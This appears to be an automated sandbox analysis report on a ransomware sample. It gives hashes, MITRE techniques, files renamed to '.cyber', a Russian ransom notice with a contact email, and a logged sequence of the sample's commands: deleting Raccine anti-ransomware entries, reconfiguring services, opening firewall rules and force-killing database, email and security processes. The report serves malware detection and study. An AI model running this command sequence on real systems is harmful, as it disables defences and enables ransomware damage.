fedb39ac98c39b688703f1968405d75432d881ff34405d3087a989440735aa8e

General

Target

iE8JUAJp7.bin.exe
Size

385KB
MD5

a9a0fae4766d9f7cafa1560f5f62e46f
SHA1

d582608dc07bd9f771334cdb60626755997dd56c
SHA256

f70966e32d18a1e2ed51ebdcc6b985d8f7613febf0680639076c71ebeab6a350
SHA512

5c2f89a16c5291d509f41bd5f12d18a386892738cfd5fb5cbd2156c52d46f28abde5f199461fe9a8bf3aa3f7e4644fe66c3ad48c3b114b792efdbf421468856b

Score

8^/10

evasion persistence ransomware

Malware Config

Signatures

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

Processes:

description flow ioc

HTTP URL 32 http://live.sysinternals.com/PsExec.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

description	flow	ioc
HTTP URL	32	http://live.sysinternals.com/PsExec.exe

Modifies extensions of user files 10 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

iE8JUAJp7.bin.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\UnlockReset.crw.cyber	iE8JUAJp7.bin.exe
File renamed	C:\Users\Admin\Pictures\EnterGet.tif => C:\Users\Admin\Pictures\EnterGet.tif.cyber	iE8JUAJp7.bin.exe
File renamed	C:\Users\Admin\Pictures\HideComplete.crw => C:\Users\Admin\Pictures\HideComplete.crw.cyber	iE8JUAJp7.bin.exe
File opened for modification	C:\Users\Admin\Pictures\HideComplete.crw.cyber	iE8JUAJp7.bin.exe
File renamed	C:\Users\Admin\Pictures\HideUndo.crw => C:\Users\Admin\Pictures\HideUndo.crw.cyber	iE8JUAJp7.bin.exe
File renamed	C:\Users\Admin\Pictures\UnlockReset.crw => C:\Users\Admin\Pictures\UnlockReset.crw.cyber	iE8JUAJp7.bin.exe
File opened for modification	C:\Users\Admin\Pictures\EnterGet.tif.cyber	iE8JUAJp7.bin.exe
File opened for modification	C:\Users\Admin\Pictures\HideUndo.crw.cyber	iE8JUAJp7.bin.exe
File renamed	C:\Users\Admin\Pictures\RestartUpdate.crw => C:\Users\Admin\Pictures\RestartUpdate.crw.cyber	iE8JUAJp7.bin.exe
File opened for modification	C:\Users\Admin\Pictures\RestartUpdate.crw.cyber	iE8JUAJp7.bin.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

iE8JUAJp7.bin.exe

description	ioc	process
File opened (read-only)	\??\T:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\O:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\G:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\Z:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\V:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\N:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\E:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\S:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\K:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\L:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\X:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\Y:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\A:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\F:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\B:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\P:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\W:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\R:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\U:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\I:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\H:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\J:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\M:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\Q:	iE8JUAJp7.bin.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

27 icanhazip.com

flow	ioc
27	icanhazip.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

iE8JUAJp7.bin.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Внимание Внимание Внимание!!!"	iE8JUAJp7.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Добрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - cyber@outlookpro.net\r\n\r\nХорошего и продуктивного дня!"	iE8JUAJp7.bin.exe

Drops file in Windows directory 13 IoCs

Processes:

netsh.exe

description	ioc	process
File created	C:\Windows\rescache\_merged\2483382631\1144272743.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3418783148\4223189797.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4183903823\1195458082.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4185669309\1880392806.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1301087654\4010849688.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1476457207\263943467.pri	netsh.exe
File created	C:\Windows\rescache\_merged\423379043\2764571712.pri	netsh.exe
File created	C:\Windows\rescache\_merged\81479705\2284120958.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4272278488\927794230.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1601268389\3068621934.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1974107395\1506172464.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2878165772\3312292840.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3623239459\11870838.pri	netsh.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 58 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
3944	taskkill.exe
2332	taskkill.exe
1368	taskkill.exe
3052	taskkill.exe
2512	taskkill.exe
2108	taskkill.exe
1448	taskkill.exe
2832	taskkill.exe
2496	taskkill.exe
960	taskkill.exe
1104	taskkill.exe
348	taskkill.exe
1068	taskkill.exe
1292	taskkill.exe
3716	taskkill.exe
2908	taskkill.exe
3232	taskkill.exe
1676	taskkill.exe
1104	taskkill.exe
996	taskkill.exe
900	taskkill.exe
2544	taskkill.exe
3012	taskkill.exe
3164	taskkill.exe
984	taskkill.exe
1176	taskkill.exe
4068	taskkill.exe
2532	taskkill.exe
1516	taskkill.exe
2288	taskkill.exe
1908	taskkill.exe
1264	taskkill.exe
1896	taskkill.exe
2136	taskkill.exe
3124	taskkill.exe
3460	taskkill.exe
2040	taskkill.exe
1696	taskkill.exe
3200	taskkill.exe
3980	taskkill.exe
2888	taskkill.exe
2676	taskkill.exe
2396	taskkill.exe
3976	taskkill.exe
1676	taskkill.exe
3740	taskkill.exe
1020	taskkill.exe
840	taskkill.exe
1080	taskkill.exe
1788	taskkill.exe
3608	taskkill.exe
988	taskkill.exe
1620	taskkill.exe
4008	taskkill.exe
3492	taskkill.exe
1056	taskkill.exe
1536	taskkill.exe
1828	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3832 reg.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

68 PING.EXE

pid	process
3832	reg.exe

pid	process
68	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

iE8JUAJp7.bin.exe

pid	process
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe
3940	iE8JUAJp7.bin.exe

Suspicious use of AdjustPrivilegeToken 59 IoCs

Processes:

iE8JUAJp7.bin.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exenetsh.exeConhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3940	iE8JUAJp7.bin.exe
Token: SeDebugPrivilege	3940	iE8JUAJp7.bin.exe
Token: SeDebugPrivilege	1104	taskkill.exe
Token: SeDebugPrivilege	1368	taskkill.exe
Token: SeDebugPrivilege	1828	taskkill.exe
Token: SeDebugPrivilege	4068	taskkill.exe
Token: SeDebugPrivilege	2288	taskkill.exe
Token: SeDebugPrivilege	2544	taskkill.exe
Token: SeDebugPrivilege	3492	taskkill.exe
Token: SeDebugPrivilege	3232	netsh.exe
Token: SeDebugPrivilege	2136	Conhost.exe
Token: SeDebugPrivilege	3608	taskkill.exe
Token: SeDebugPrivilege	2108	taskkill.exe
Token: SeDebugPrivilege	1676	taskkill.exe
Token: SeDebugPrivilege	2888	taskkill.exe
Token: SeDebugPrivilege	3012	taskkill.exe
Token: SeDebugPrivilege	1448	taskkill.exe
Token: SeDebugPrivilege	3944	taskkill.exe
Token: SeDebugPrivilege	900	taskkill.exe
Token: SeDebugPrivilege	1908	taskkill.exe
Token: SeDebugPrivilege	3164	taskkill.exe
Token: SeDebugPrivilege	4008	taskkill.exe
Token: SeDebugPrivilege	2532	taskkill.exe
Token: SeDebugPrivilege	2332	taskkill.exe
Token: SeDebugPrivilege	2512	taskkill.exe
Token: SeDebugPrivilege	1696	taskkill.exe
Token: SeDebugPrivilege	3124	taskkill.exe
Token: SeDebugPrivilege	1516	taskkill.exe
Token: SeDebugPrivilege	988	taskkill.exe
Token: SeDebugPrivilege	984	taskkill.exe
Token: SeDebugPrivilege	348	taskkill.exe
Token: SeDebugPrivilege	1264	taskkill.exe
Token: SeDebugPrivilege	1068	taskkill.exe
Token: SeDebugPrivilege	1896	taskkill.exe
Token: SeDebugPrivilege	1020	taskkill.exe
Token: SeDebugPrivilege	840	taskkill.exe
Token: SeDebugPrivilege	1292	taskkill.exe
Token: SeDebugPrivilege	1676	taskkill.exe
Token: SeDebugPrivilege	3460	taskkill.exe
Token: SeDebugPrivilege	1176	taskkill.exe
Token: SeDebugPrivilege	1104	taskkill.exe
Token: SeDebugPrivilege	1620	taskkill.exe
Token: SeDebugPrivilege	2832	taskkill.exe
Token: SeDebugPrivilege	2040	taskkill.exe
Token: SeDebugPrivilege	3740	taskkill.exe
Token: SeDebugPrivilege	1080	taskkill.exe
Token: SeDebugPrivilege	3200	taskkill.exe
Token: SeDebugPrivilege	996	taskkill.exe
Token: SeDebugPrivilege	2496	taskkill.exe
Token: SeDebugPrivilege	960	taskkill.exe
Token: SeDebugPrivilege	2676	taskkill.exe
Token: SeDebugPrivilege	1788	taskkill.exe
Token: SeDebugPrivilege	3716	taskkill.exe
Token: SeDebugPrivilege	2396	taskkill.exe
Token: SeDebugPrivilege	3976	taskkill.exe
Token: SeDebugPrivilege	3980	taskkill.exe
Token: SeDebugPrivilege	2908	taskkill.exe
Token: SeDebugPrivilege	3052	taskkill.exe
Token: SeDebugPrivilege	3632	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

iE8JUAJp7.bin.exe

pid process

3940 iE8JUAJp7.bin.exe
3940 iE8JUAJp7.bin.exe
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

iE8JUAJp7.bin.exe

pid process

3940 iE8JUAJp7.bin.exe
3940 iE8JUAJp7.bin.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

iE8JUAJp7.bin.exe

description	pid	process	target process
PID 3940 wrote to memory of 1104	3940	iE8JUAJp7.bin.exe	taskkill.exe
PID 3940 wrote to memory of 1104	3940	iE8JUAJp7.bin.exe	taskkill.exe
PID 3940 wrote to memory of 1104	3940	iE8JUAJp7.bin.exe	taskkill.exe
PID 3940 wrote to memory of 816	3940	iE8JUAJp7.bin.exe	reg.exe
PID 3940 wrote to memory of 816	3940	iE8JUAJp7.bin.exe	reg.exe
PID 3940 wrote to memory of 816	3940	iE8JUAJp7.bin.exe	reg.exe
PID 3940 wrote to memory of 3832	3940	iE8JUAJp7.bin.exe	reg.exe
PID 3940 wrote to memory of 3832	3940	iE8JUAJp7.bin.exe	reg.exe
PID 3940 wrote to memory of 3832	3940	iE8JUAJp7.bin.exe	reg.exe
PID 3940 wrote to memory of 3716	3940	iE8JUAJp7.bin.exe	schtasks.exe
PID 3940 wrote to memory of 3716	3940	iE8JUAJp7.bin.exe	schtasks.exe
PID 3940 wrote to memory of 3716	3940	iE8JUAJp7.bin.exe	schtasks.exe
PID 3940 wrote to memory of 380	3940	iE8JUAJp7.bin.exe	sc.exe
PID 3940 wrote to memory of 380	3940	iE8JUAJp7.bin.exe	sc.exe
PID 3940 wrote to memory of 380	3940	iE8JUAJp7.bin.exe	sc.exe
PID 3940 wrote to memory of 1424	3940	iE8JUAJp7.bin.exe	netsh.exe
PID 3940 wrote to memory of 1424	3940	iE8JUAJp7.bin.exe	netsh.exe
PID 3940 wrote to memory of 1424	3940	iE8JUAJp7.bin.exe	netsh.exe
PID 3940 wrote to memory of 2912	3940	iE8JUAJp7.bin.exe	sc.exe
PID 3940 wrote to memory of 2912	3940	iE8JUAJp7.bin.exe	sc.exe
PID 3940 wrote to memory of 2912	3940	iE8JUAJp7.bin.exe	sc.exe
PID 3940 wrote to memory of 1792	3940	iE8JUAJp7.bin.exe	sc.exe
PID 3940 wrote to memory of 1792	3940	iE8JUAJp7.bin.exe	sc.exe
PID 3940 wrote to memory of 1792	3940	iE8JUAJp7.bin.exe	sc.exe
PID 3940 wrote to memory of 1152	3940	iE8JUAJp7.bin.exe	sc.exe
PID 3940 wrote to memory of 1152	3940	iE8JUAJp7.bin.exe	sc.exe
PID 3940 wrote to memory of 1152	3940	iE8JUAJp7.bin.exe	sc.exe
PID 3940 wrote to memory of 2924	3940	iE8JUAJp7.bin.exe	sc.exe
PID 3940 wrote to memory of 2924	3940	iE8JUAJp7.bin.exe	sc.exe
PID 3940 wrote to memory of 2924	3940	iE8JUAJp7.bin.exe	sc.exe
PID 3940 wrote to memory of 1544	3940	iE8JUAJp7.bin.exe	sc.exe
PID 3940 wrote to memory of 1544	3940	iE8JUAJp7.bin.exe	sc.exe
PID 3940 wrote to memory of 1544	3940	iE8JUAJp7.bin.exe	sc.exe
PID 3940 wrote to memory of 836	3940	iE8JUAJp7.bin.exe	sc.exe
PID 3940 wrote to memory of 836	3940	iE8JUAJp7.bin.exe	sc.exe
PID 3940 wrote to memory of 836	3940	iE8JUAJp7.bin.exe	sc.exe
PID 3940 wrote to memory of 60	3940	iE8JUAJp7.bin.exe	sc.exe
PID 3940 wrote to memory of 60	3940	iE8JUAJp7.bin.exe	sc.exe
PID 3940 wrote to memory of 60	3940	iE8JUAJp7.bin.exe	sc.exe
PID 3940 wrote to memory of 1828	3940	iE8JUAJp7.bin.exe	taskkill.exe
PID 3940 wrote to memory of 1828	3940	iE8JUAJp7.bin.exe	taskkill.exe
PID 3940 wrote to memory of 1828	3940	iE8JUAJp7.bin.exe	taskkill.exe
PID 3940 wrote to memory of 1368	3940	iE8JUAJp7.bin.exe	taskkill.exe
PID 3940 wrote to memory of 1368	3940	iE8JUAJp7.bin.exe	taskkill.exe
PID 3940 wrote to memory of 1368	3940	iE8JUAJp7.bin.exe	taskkill.exe
PID 3940 wrote to memory of 4068	3940	iE8JUAJp7.bin.exe	taskkill.exe
PID 3940 wrote to memory of 4068	3940	iE8JUAJp7.bin.exe	taskkill.exe
PID 3940 wrote to memory of 4068	3940	iE8JUAJp7.bin.exe	taskkill.exe
PID 3940 wrote to memory of 2288	3940	iE8JUAJp7.bin.exe	taskkill.exe
PID 3940 wrote to memory of 2288	3940	iE8JUAJp7.bin.exe	taskkill.exe
PID 3940 wrote to memory of 2288	3940	iE8JUAJp7.bin.exe	taskkill.exe
PID 3940 wrote to memory of 2544	3940	iE8JUAJp7.bin.exe	taskkill.exe
PID 3940 wrote to memory of 2544	3940	iE8JUAJp7.bin.exe	taskkill.exe
PID 3940 wrote to memory of 2544	3940	iE8JUAJp7.bin.exe	taskkill.exe
PID 3940 wrote to memory of 3492	3940	iE8JUAJp7.bin.exe	taskkill.exe
PID 3940 wrote to memory of 3492	3940	iE8JUAJp7.bin.exe	taskkill.exe
PID 3940 wrote to memory of 3492	3940	iE8JUAJp7.bin.exe	taskkill.exe
PID 3940 wrote to memory of 3232	3940	iE8JUAJp7.bin.exe	netsh.exe
PID 3940 wrote to memory of 3232	3940	iE8JUAJp7.bin.exe	netsh.exe
PID 3940 wrote to memory of 3232	3940	iE8JUAJp7.bin.exe	netsh.exe
PID 3940 wrote to memory of 2136	3940	iE8JUAJp7.bin.exe	Conhost.exe
PID 3940 wrote to memory of 2136	3940	iE8JUAJp7.bin.exe	Conhost.exe
PID 3940 wrote to memory of 2136	3940	iE8JUAJp7.bin.exe	Conhost.exe
PID 3940 wrote to memory of 3608	3940	iE8JUAJp7.bin.exe	taskkill.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

iE8JUAJp7.bin.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	iE8JUAJp7.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	iE8JUAJp7.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Внимание Внимание Внимание!!!"	iE8JUAJp7.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Добрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - cyber@outlookpro.net\r\n\r\nХорошего и продуктивного дня!"	iE8JUAJp7.bin.exe

C:\Users\Admin\AppData\Local\Temp\iE8JUAJp7.bin.exe
"C:\Users\Admin\AppData\Local\Temp\iE8JUAJp7.bin.exe"
1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3940

C:\Windows\SysWOW64\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1104

C:\Windows\SysWOW64\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
2⤵
PID:816

C:\Windows\SysWOW64\reg.exe
"reg" delete HKCU\Software\Raccine /F
2⤵
- Modifies registry key
PID:3832

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
2⤵
PID:3716

C:\Windows\SysWOW64\sc.exe
"sc.exe" config Dnscache start= auto
2⤵
PID:380

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
- Drops file in Windows directory
PID:1424

C:\Windows\SysWOW64\sc.exe
"sc.exe" config FDResPub start= auto
2⤵
PID:2912

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
2⤵
PID:1792

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SSDPSRV start= auto
2⤵
PID:1152

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:2924

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
2⤵
PID:1544

C:\Windows\SysWOW64\sc.exe
"sc.exe" config upnphost start= auto
2⤵
PID:836

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
2⤵
PID:60

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1828

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1368

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4068

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2288

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2544

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3492

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
2⤵
- Kills process with taskkill
PID:3232

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
PID:2136

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3608

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2108

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
2⤵
- Kills process with taskkill
PID:1676

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM steam.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2888

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3012

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1448

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3944

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:900

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1908

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3164

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4008

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM excel.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2532

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2332

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2512

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1696

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3124

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1516

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:984

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:988

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
2⤵
- Kills process with taskkill
PID:1056

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:348

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1264

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1068

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1896

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1020

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:840

